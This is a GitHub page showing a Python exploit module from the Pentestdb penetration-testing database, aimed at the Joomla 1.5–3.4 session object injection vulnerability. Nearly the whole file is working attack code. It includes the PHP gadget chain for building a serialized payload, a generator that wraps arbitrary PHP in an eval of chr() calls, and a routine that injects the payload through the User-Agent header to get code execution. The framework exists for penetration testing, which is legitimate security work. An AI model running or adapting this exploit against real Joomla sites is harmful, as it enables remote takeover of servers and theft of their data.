-
Notifications
You must be signed in to change notification settings - Fork 277
/
cms_joomla_3_4_session_object_injection.py
96 lines (76 loc) · 3.02 KB
/
cms_joomla_3_4_session_object_injection.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
Pentestdb, a database for penetration test.
Copyright (c) 2015 alpha1e0
'''
from pentest.libs.exploit import Exploit
from pentest.libs.exploit import Result
'''attack_payload 生成方法:
<?php
header("Content-Type: text/plain");
class JSimplepieFactory {
}
class JDatabaseDriverMysql {
}
class SimplePie {
var $sanitize;
var $cache;
var $cache_name_function;
var $javascript;
var $feed_url;
function __construct()
{
$this->feed_url = "phpinfo();JFactory::getConfig();exit;";
$this->javascript = 9999;
$this->cache_name_function = "assert";
$this->sanitize = new JDatabaseDriverMysql();
$this->cache = true;
}
}
class JDatabaseDriverMysqli {
protected $a;
protected $disconnectHandlers;
protected $connection;
function __construct()
{
$this->a = new JSimplepieFactory();
$x = new SimplePie();
$this->connection = 1;
$this->disconnectHandlers = array(array($x,"init"));
}
}
$a = new JDatabaseDriverMysqli();
$result = serialize($a);
$result = str_replace(chr(0).'*'.chr(0), '\x5C0\x5C0\x5C0', $result);
echo '}__t|'.$result.'\xF0\x9D\x8C\x86';
?>
'''
class JoomlaSOI(Exploit):
expName = u"Joomla 1.5~3.4 session对象注入漏洞exploit"
version = "1.0"
author = "alpha1e0"
language = "php"
appName = "joomla"
appVersion = "1.5~3.4"
reference = ['http://drops.wooyun.org/papers/11330']
description = u'''
joomla 1.5~3.4 session 对象注入漏洞,成功利用同时需要PHP < 5.6.13。joomla中session存储在数据库中,其中user-agent,
x-forward-for未经过滤存储到数据库中,可在其中插入序列化对象,session_start后自动反序列化触发命令执行
'''
def _verify(self):
result = Result(self)
php_code = '''echo "asdfgh123456";'''
attack_payload = self._genPayload(php_code)
response = self.http.get(self.url, headers={"User-Agent":attack_payload})
if response.status_code == 200:
response = self.http.get(self.url)
if response.status_code == 200 and 'asdfgh123456' in response.content:
result['fullpath'] = self.url
result['payload'] = attack_payload
return result
def _genPayload(self, raw_payload):
template = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:%d:"%sJFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86'
encoded_payload = ".".join(["chr({0})".format(ord(x)) for x in raw_payload])
encoded_payload = "eval({0});".format(encoded_payload)
return template % (27+len(encoded_payload), encoded_payload)